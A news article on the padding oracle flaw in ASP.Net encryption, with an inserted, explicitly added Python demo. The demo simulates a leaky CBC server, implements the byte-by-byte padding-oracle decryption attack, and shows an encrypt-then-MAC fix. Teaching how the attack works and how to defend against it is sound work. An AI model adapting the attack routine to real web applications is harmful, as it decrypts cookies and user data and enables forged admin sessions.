ASP.Net Web Apps Face Risk of 'Padding Oracle' Crypto Attack

Web apps built on ASP.Net may face a new wave of crypto attacks, putting sensitive data, as well as Microsoft's already tarnished security reputation, at risk. The so-called "padding oracle" attack affects every ASP.Net Web application, according to security researcher Juliano Rizzo, enabling an attacker to decrypt cookies, view states, passwords, user data (such as Social Security numbers), and anything else encrypted using the framework's API. Beyond getting their hands on sensitive data, malicious hackers could use the exploit to forge authentication tickets and access applications with admin rights.

The attack takes advantage of a bug in how ASP.Net uses AES (Advanced Encryption Standard), not of a weakness in the cipher itself. ASP.Net encrypts data with AES in CBC mode, and when it decrypts a value an attacker has tampered with, the server's response reveals whether the decrypted padding was valid. That yes-or-no answer is the "oracle": by submitting many carefully modified ciphertexts and watching how the server reacts, an attacker can recover the plaintext one byte at a time, and can then build ciphertexts that decrypt to data of their choosing, all without ever learning the key.
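The mechanism described above, as an added worked example that is not code from the original article, from Microsoft, or from the researchers' own tool: a Python script with a leaky CBC decryptor whose padding errors are observable, the byte-at-a-time attack that turns those errors into plaintext, and the encrypt-then-MAC fix that stops it. Keys, the cookie-like plaintext, and all function names are constructed for the demo; a small HMAC-based Feistel cipher stands in for AES so the script runs on the standard library alone, which is safe here because the attack depends only on CBC chaining and padding validation, never on the block cipher's internals.

```python
import hashlib, hmac, os
BLOCK = 16

# Toy 16-byte block cipher (4-round Feistel keyed with HMAC-SHA256) standing in
# for AES; the attack below only touches CBC chaining and PKCS#7 padding.
def _f(key, i, half):
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]
def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))
def block_encrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, xor(l, _f(key, i, r))
    return l + r
def block_decrypt(key, blk):
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = xor(r, _f(key, i, l)), l
    return l + r
def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n
def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]
def cbc_encrypt(key, iv, padded):
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, xor(prev, padded[i:i + BLOCK]))
        out += prev
    return out
def cbc_decrypt(key, iv, ct):
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(xor(p, block_decrypt(key, c)) for p, c in zip([iv] + blocks, blocks))

# Leaky server: a padding failure is distinguishable from success. That one bit per query is the oracle.
def padding_oracle(key, iv, ct):
    try:
        unpad(cbc_decrypt(key, iv, ct))
        return True
    except ValueError:
        return False

# Attack: recover D_k(target) byte by byte, right to left, by forging the block
# that precedes it so the decrypted tail becomes valid padding 01, 02 02, 03 03 03, ...
def attack_block(oracle, prev, target):
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        forged = bytearray(BLOCK)
        for j in range(pos + 1, BLOCK):
            forged[j] = inter[j] ^ padval  # bytes already known -> padval
        for guess in range(256):
            forged[pos] = guess
            if not oracle(bytes(forged), target):
                continue
            if pos == BLOCK - 1:  # rule out a false hit such as 02 02: flip byte 14 and re-ask
                check = bytes(forged[:-2]) + bytes([forged[-2] ^ 0xFF, guess])
                if not oracle(check, target):
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("no padding hit: the server is not an oracle")
    return xor(inter, prev)  # plaintext block = D_k(target) XOR previous block
def padding_oracle_decrypt(oracle, iv, ct):
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return unpad(b"".join(attack_block(oracle, blocks[i - 1], blocks[i])
                          for i in range(1, len(blocks))))

# Fix: encrypt-then-MAC. Authenticate iv||ct first; any tampered input gets one
# uniform answer and the padding check is never reached.
def seal(key, mac_key, plaintext):
    iv = os.urandom(BLOCK)
    ct = cbc_encrypt(key, iv, pad(plaintext))
    return iv + ct + hmac.new(mac_key, iv + ct, hashlib.sha256).digest()
def open_sealed(key, mac_key, blob):
    iv, ct, tag = blob[:BLOCK], blob[BLOCK:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, iv + ct, hashlib.sha256).digest()):
        return None
    try:
        return unpad(cbc_decrypt(key, iv, ct))
    except ValueError:
        return None
KEY, MAC_KEY = b"\x01" * BLOCK, b"\x02" * BLOCK  # constructed demo keys
SECRET = b"user=alice;role=admin"  # constructed stand-in for an encrypted cookie
def attack_leaky_server():
    iv = bytes(range(BLOCK))
    ct = cbc_encrypt(KEY, iv, pad(SECRET))
    return padding_oracle_decrypt(lambda p, b: padding_oracle(KEY, p, b), iv, ct)
def attack_hardened_server():
    blob = seal(KEY, MAC_KEY, SECRET)
    oracle = lambda p, b: open_sealed(KEY, MAC_KEY, p + b + blob[-32:]) is not None
    try:
        return padding_oracle_decrypt(oracle, blob[:BLOCK], blob[BLOCK:-32])
    except RuntimeError:
        return None  # the attack stalls on the very first byte: nothing leaks
```

`attack_leaky_server()` returns the full cookie plaintext using at most 256 queries per byte and no knowledge of `KEY`; the same loop against `open_sealed` never sees a single "valid padding" answer, because the MAC check rejects every forged block before decryption runs. The extra re-query at the last byte position handles the classic false positive where a guess produces a valid two-byte (or longer) padding instead of `01`.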

Notably, ASP.Net isn't the only platform that can be affected by padding oracle attacks, which have been known since 2002. Rizzo and fellow researcher Thai Duong, who developed these attacks, previously demonstrated weaknesses in JavaServer Faces, Ruby on Rails, and OWASP ESAPI. The fact that this one targets the ASP.Net platform, however, will likely boost awareness of the problem, and the Redmond giant is likely to bear the brunt of the criticism.
